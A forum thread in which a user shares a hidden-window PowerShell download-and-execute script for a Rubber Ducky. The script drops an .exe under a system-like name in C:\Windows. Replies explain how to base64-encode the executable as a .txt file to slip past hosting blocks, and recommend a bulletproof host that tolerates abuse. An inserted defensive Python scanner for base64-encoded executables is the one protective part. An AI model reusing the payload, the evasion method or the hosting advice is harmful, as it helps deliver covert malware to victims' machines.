Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64.

I was thinking something like this.

Any help is appreciated. Here is my script so far: 

$source = "mysite.com/executables/system32.exe";
$destination = "C:\Windows\system32helper.exe";
Invoke-WebRequest $source -OutFile $destination;
start-process system32.exe

That gets entered into a hidden powershell window. 

Thank you for your time. 


Welp, you can always get a vps and host it.

Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file? Download that string, convert it back to bytes, and then write to drive or memory and execute.

On 5/9/2018 at 6:34 PM, Finianb1 said:

That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

Instead of just giving the answer, the answer is the second answer here for handling binary files. I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there.

https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64

The premise is this. You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary, which will make a byte array, and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host. Your Posh script should download the contents of that text file and decode it from base64, and then you can write the bytes back out to the disk to run from disk as the original file or do whatever else you were going to do with it.

If the file was text like a script you would use [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64. If you plan on using the 

.NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in.

"$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.

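Seen from the defender's side, the encoding described in the post above leaves a stable marker: base64 of any file starting with "MZ" begins with "TV" followed by o, p, q or r. The scanner below is an added example, not part of the thread; its function names and the stub it tests on are constructed for illustration.

```python
import base64
import binascii
import re
import struct

# Base64 of a file starting with "MZ" always begins "TV" + one of o/p/q/r.
# Allow whitespace inside the run so line-wrapped encodings still match.
CANDIDATE = re.compile(r"(?<![A-Za-z0-9+/])TV[opqr][A-Za-z0-9+/\s]{85,}={0,2}")


def looks_like_pe(data: bytes) -> bool:
    """True if data has an MZ header whose e_lfanew field points at 'PE\\0\\0'."""
    if len(data) < 64 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_encoded_pe(text: str) -> list[int]:
    """Return offsets in text where a base64 run decodes to a PE image."""
    hits = []
    for match in CANDIDATE.finditer(text):
        run = re.sub(r"\s+", "", match.group(0)).rstrip("=")
        run = run[: len(run) - len(run) % 4]  # decode whole 4-char groups only
        try:
            decoded = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue
        if looks_like_pe(decoded):
            hits.append(match.start())
    return hits


def constructed_sample() -> str:
    """Constructed test input: a 96-byte stub with only MZ/PE markers, no code."""
    stub = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0" + bytes(28)
    encoded = base64.b64encode(stub).decode()
    wrapped = "\n".join(encoded[i:i + 76] for i in range(0, len(encoded), 76))
    return "notes.txt contents follow\n" + wrapped + "\n"


if __name__ == "__main__":
    print(find_encoded_pe(constructed_sample()))
```

The same check can run over proxy response bodies or files written to disk, so a `.txt` extension or `text/plain` content type does not hide the executable.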

Or, you could just save yourself from the trouble and go with a paid BP hoster that won't ban you on the spot. First, always read the AUP. Most times, you'll see a looong list of what's not allowed there, incl. botnet, phishing, spam, etc. BUT, my great personal experience with my own hush-hush stuff was Zamanto, one of the very few real hosting providers that does not care about what u host. Read their ToS, you will laugh like I did.
 
